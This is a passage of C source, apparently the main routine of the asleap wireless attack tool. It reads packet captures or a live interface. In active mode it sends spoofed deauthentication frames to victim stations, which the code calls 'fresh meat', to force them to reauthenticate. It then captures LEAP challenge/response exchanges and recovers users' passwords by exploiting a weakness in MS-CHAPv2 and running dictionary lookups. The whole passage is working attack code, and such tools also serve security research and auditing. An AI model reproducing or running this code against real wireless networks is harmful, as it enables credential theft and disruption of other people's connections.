            if ((offlinepcap.apeekfp = fopen(offlinepcap.filename, "rb")) 
              == NULL) {
                fprintf(stderr, "Cannot open file %s.\n", offlinepcap.filename);
                perror("Unable to open capture file");
                cleanup();
            }

            /* We have to skip to the section of the file that contains packet
               information. */
/*
            if (fseek(offlinepcap.apeekfp, APEEKX_MIN_PKTS_OFFSET, 
                SEEK_SET) < 0) {
                perror("Unable to seek to data offset");
                cleanup();
            }
*/

            if (find_pktsdelim(offlinepcap.apeekfp) != 0) {
                fprintf(stderr, "Unable to identify offset for packet "
                        "payload.\n");
                cleanup();
            }

            if (fread(&apeekpktsh, sizeof(apeekpktsh), 1, 
                offlinepcap.apeekfp) < 1) {
                perror("Unable to read from capture file");
                cleanup();
            }
            break;

            case APEEK_LEGACY_OFFLINE_PCAP:
            /* Airopeek pre v2.X capture file */
            if ((offlinepcap.apeekfp = fopen(offlinepcap.filename, "rb")) 
                == NULL) {
                perror("Unable to open capture file");
                cleanup();
            }

            /* Read past the initial header information of the file */
            fread(&masterh, sizeof(masterh), 1, offlinepcap.apeekfp);
            fread(&secondh, sizeof(secondh), 1, offlinepcap.apeekfp);
            break;

            case LIBPCAP_OFFLINE_PCAP:
            /* Libpcap file */
            p = pcap_open_offline(offlinepcap.filename, errbuf);
            if (p == NULL) {
                perror("Unable to open capture file");
                exit(-1);
            }
            break;

        }

    } else {

#ifndef _LINUX
        fprintf(stderr, "No support for reading from an interface in "
            "Windows.\n");
        exit(-1);
#endif

        p = pcap_open_live(device, SNAPLEN, PROMISC, TIMEOUT, errbuf);

        if (p == NULL) {
             fprintf(stderr, "pcap_open failed: %s\n", errbuf);
             exit(-1);
        }

    }


    /* If the user passed -w filename, open a pcap handle to write discovered
       LEAP exchanges.  This works really well when we are reading from a
       pcap source (live interface or a libpcap capture file), but we have to 
       kludge a little bit if we are reading from an Airopeek stored file. */
    if (!IsBlank(wpcap.wfilename)) {
        if (p == NULL) {
            /* Fill the initial pcap header with information from
             * pcap_open_dead.
             */
            p = pcap_open_dead(DLT_IEEE802_11, 65535);
        }

        wpcap.wp = pcap_dump_open(p, wpcap.wfilename);
        if (wpcap.wp == NULL) {
            perror("pcap_dump_open");
            memset(&wpcap, 0, sizeof(wpcap));
        }
    }


    /* If the interface passed to us is not "^aj", we use passive mode. */
    if (activeattack && (strncmp(device, "aj", 2))) {
        fprintf(stderr, "Interface %s does not appear to be a ", device);
        fprintf(stderr, "AirJack interface.\n");
        activeattack=0;
    } 

    if (activeattack) {

#ifndef _LINUX
        fprintf(stderr, "Active attack is only available on Linux.\n");
        cleanup();
        exit(0);
#else
        printf("Using the active attack method.\n");

        /* Set our channel */
        if (channel && !channelhop) {
           if (channel < 1 || channel > MAXCHANNEL) {
               usage("Bad channel selection");
               cleanup();
           } else {
               if (aj_setchannel(ajdata.ifname, channel)) {
                   perror("aj_setchannel");
                   cleanup();
               }
           }
        }

        /* Set our SSID */
        if (aj_setessid(ajdata.ifname, "asleap", 6)) {
            perror("aj_setessid");
        }

        /* Set out MAC */
        if (aj_setmac(ajdata.ifname, "\x00\x40\x96\x00\x00\x00")) {
            perror("aj_setmac");
        }


        /* Make sure mode is appropriate for injecting packets */
        if (aj_setmode(ajdata.ifname, 5)) { 
            perror("aj_setmode");
            cleanup();
        }

        if (aj_setmonitor(ajdata.ifname, 1)) {
            perror("aj_setmonitor");
            cleanup();
        }


        /* Go non-blocking.  This is only necessary if we are channel hopping */
           if (aj_setnonblock(ajdata.ifname, 1)) {
            fprintf(stderr, "Error setting nonblock mode.\n");
            perror("aj_setnonblock");
            exit(-1);
        } 
#endif


    } else {
    
        printf("Using the passive attack method.\n");

       /* DLT_IEEE802_11 == 105  This could be written to work in DLT_EN10MB
          instead of RFMON since all the frames we are interested in are 
          data frames.  Using RFMON lets us port this to an active attack tool
          to force users to reauthenticate and give up their credentials on
          demand by sending spoofed deauthenticate frames to the victim.
          We don't perform a similar test for AiroPeek files, since a file
          that is not an AiroPeek file would have previously failed the
          verify_apeek() call.  */
       if (offlinepcap.offlinetype == LIBPCAP_OFFLINE_PCAP) {
           if (pcap_datalink(p) != DLT_IEEE802_11) {
               fprintf(stderr, "Not in RFMON mode - datlink is %d.\n", 
                   pcap_datalink(p));
               cleanup();
               exit(-1);
           }
       }

    }


/*
 * Our attack method is to collect frames until we get an EAP-Challenge packet.
 * From the EAP-Challenge packet we collect the 8-byte challenge, then wait for
 * the EAP-Response to collect the response information.  With the challenge
 * and response, we start the grinder to abuse weaknesses in MS-CHAPv2 to
 * recover weak passwords.  The username information is sent in the clear in
 * both challenge and response traffic.  Take a look at asleap.h for packet
 * definition information.
 */


    while(1) {

        if(activeattack) {

#ifndef _LINUX
            fprintf(stderr, "Active attack is only available on Linux.\n");
            cleanup();
            exit(0);
#else

    
            /* Start an infinite loop until user presses CTRL/C, or if
               findleapexch() returns 0 -- break. */
            gettimeofday(&then, NULL);
            epochstart = ((then.tv_sec * 1000000) + then.tv_usec);

            while(1) {

                if (channelhop) {
                    /* Change the channel every CHANHOPTIME usec */
                    gettimeofday(&now, NULL);
                    elapsed =
                       (((now.tv_sec * 1000000) + now.tv_usec) - epochstart);
                    if (elapsed > CHANHOPTIME) {
                        channel = nextchannel(&ajdata, channel);
                        if (channel == -1) {
                            perror("nextchannel");
                            cleanup();
                        }

                        if (asleap.verbose > 0) 
                            printf("Changing channel to %d.\n", channel);

                        /* Update epochstart with current time */
                        gettimeofday(&then, NULL);
                        epochstart = ((then.tv_sec * 1000000) + then.tv_usec);
                    }
                }
    
                /* Start collecting packets, looking for any data frames */
                n = getpacket(offlinepcap);
                if (n < 0) {
                    continue;
                } else if (n == 1) {
                    if (asleap.verbose) 
                        printf("Reached EOF on pcapfile.\n");
                        cleanup();
                }

                dot11_ptr = (struct ieee80211 *)&packet[0];
    
                /* We want to find data frames, indicating a client on the
                   network.  Specifically, we are looking for TODS frames, that
                   are of type data.  This eliminates traffic from the AP,
                   since traffic from the AP would be FROMDS. We also want to
                   make sure we haven't seen this traffic yet, so we check for
                   the STA MAC with the findstamac() function. */
                if (dot11_ptr->type != 2  || dot11_ptr->subtype != 0)
                   continue;

                if(asleap.verbose) {
                    printf("Recvd a data frame: ");
                    printf("len %d tods %d fromds %d ", 
                        h.len, dot11_ptr->to_ds, dot11_ptr->from_ds);
                    printf("src %02x%02x%02x%02x%02x%02x ",
                        dot11_ptr->addr2[0], dot11_ptr->addr2[1],
                        dot11_ptr->addr2[2], dot11_ptr->addr2[3],
                        dot11_ptr->addr2[4], dot11_ptr->addr2[5]);
                    printf("dst %02x%02x%02x%02x%02x%02x\n", 
                        dot11_ptr->addr1[0], dot11_ptr->addr1[1],
                        dot11_ptr->addr1[2], dot11_ptr->addr1[3],
                        dot11_ptr->addr1[4], dot11_ptr->addr1[5]);
                }

                if (asleap.verbose > 2) {
                    lamont_hdump(packet, h.len);
                    printf("\n");
                }


                /* Test this packet to make sure it is a data frame, TODS, not
                   FROMDS, and hasn't already been discovered in our list of
                   victims. */
                if(dot11_ptr->type == 2 && dot11_ptr->subtype == 0 &&
                   dot11_ptr->to_ds && !(dot11_ptr->from_ds) &&
                   (!findstamac(dot11_ptr->addr2, clientlist))) {

                   printf("Found some fresh meat: ");
                   printf("%02x%02x%02x%02x%02x%02x\n",
                       dot11_ptr->addr2[0], dot11_ptr->addr2[1],
                       dot11_ptr->addr2[2], dot11_ptr->addr2[3],
                       dot11_ptr->addr2[4], dot11_ptr->addr2[5]);


                    /* Add the new SRC MAC to the clientlist, update the value
                       of clntcntr to reflect the position in the array of STA
                       addresses. */
                    clntcntr=addstamac(clientlist, dot11_ptr->addr2, clntcntr);
    
                    if (asleap.verbose) { 
                        printf("Sending deauth to %02x%02x%02x%02x%02x%02x ",
                            dot11_ptr->addr2[0], dot11_ptr->addr2[1],
                            dot11_ptr->addr2[2], dot11_ptr->addr2[3],
                            dot11_ptr->addr2[4], dot11_ptr->addr2[5]);
                        printf("from, %02x%02x%02x%02x%02x%02x\n",
                            dot11_ptr->addr1[0], dot11_ptr->addr1[1],
                            dot11_ptr->addr1[2], dot11_ptr->addr1[3],
                            dot11_ptr->addr1[4], dot11_ptr->addr1[5]);
                        lamont_hdump(packet, h.len);
                        printf("\n");
                    }

                    /* Disable monitor mode before injecting the packet */
                    if (aj_setmonitor(ajdata.ifname, 0) != 0) {
                        perror("aj_setmonitor");
                        cleanup();
                    }

                    /* Abaddon recommendation between switching modes */
                    usleep(250000);

                    /* deauth the station to force them to reauthenticate */
                    if (deauthsta(&ajdata, dot11_ptr->addr2, 
                        dot11_ptr->addr1)) { 
                        
                        printf("Error sending deauth.  Continuing.\n");
                    }

                    /* Change back into RFMON */
                    if (aj_setmonitor(ajdata.ifname, 1) != 0) {
                        perror("aj_setmonitor");
                        cleanup();
                    }

                    if (!(findleapexch(&asleap, findleaptimeout, wpcap,
                          offlinepcap))) {
                        printf("\nCaptured LEAP exchange information:\n");
                        print_leapexch(&asleap);
                        break; 
                    } else {
                        printf("Timeout exceeded while watching for "
                               "LEAP traffic.\n");
                        continue;
                    }
    
                } else {
    
                    /* We want another packet.  The last one sucked. */
                    continue;
    
                }
    
            }  /* End while(1) loop */
#endif
    
        } else { /*  do a passive attack */
    
            while(1) {
    
                /* Run findleapexch() indefinitely, or until LEAP credentials 
                   are found.  */
                if(!(findleapexch(&asleap, 0, wpcap, offlinepcap))) {
                    printf("\nCaptured LEAP exchange information:\n");
                    print_leapexch(&asleap);
                    break;
                } else {
                    continue;
                }
    
            }
                
        } /* End if(activeattack) loop */
    
        /* Now that we have the challenge and response information, the
           real fun begins.  With the hash and response, we can use the
           weakness in caculating the third DES key used to generate the
           response text since this is only 2^16 possible combinations. */
    
        if (asleap.verbose) 
            printf("\tAttempting to recover last 2 of hash.\n");
    
        if (gethashlast2(&asleap)) {
            /* This should really never happen */
            printf("\tCould not recover last 2 bytes of hash from the\n");
            printf("\tchallenge/response.  Sorry it didn't work out.\n");
            continue;
        } else {
            print_hashlast2(&asleap);
        }    
    
        if (asleap.verbose) 
            printf("\tStarting dictionary lookups.\n");
    
        getleappwret = getleappw(&asleap);

        if (getleappwret == 1) {
            	/* Success! Print password and hash info */
                print_leappw(&asleap);
        } else if (getleappwret == 0) {
            	/* No matching hashes found */
                printf("\tCould not find a matching NT hash.  ");
                printf("Try expanding your password list.\n");
                printf("\tI've given up.  Sorry it didn't work out.\n");
        } else {
                /* Received an error */
                printf("Experienced an error in getleappw, returned %d.\n",
                    getleappwret);
        }
    
        /* Zero out the asleap struct for another challenge/response 
         * The asleap_data struct really should be changed so it does not
         * store configuration parameter information */
        memset(&asleap.username, 0, sizeof(asleap.username));
        memset(&asleap.challenge, 0, sizeof(asleap.challenge));
        memset(&asleap.response, 0, sizeof(asleap.response));
        memset(&asleap.endofhash, 0, sizeof(asleap.endofhash));
        memset(&asleap.password, 0, sizeof(asleap.password));
        memset(&asleap.nthash, 0, sizeof(asleap.nthash));
        asleap.eapsuccess = 0;
        /* memset(&asleap, 0, sizeof(asleap)); */

    } /* End initial while(1) loop */

    exit(0);

} /* End main() */

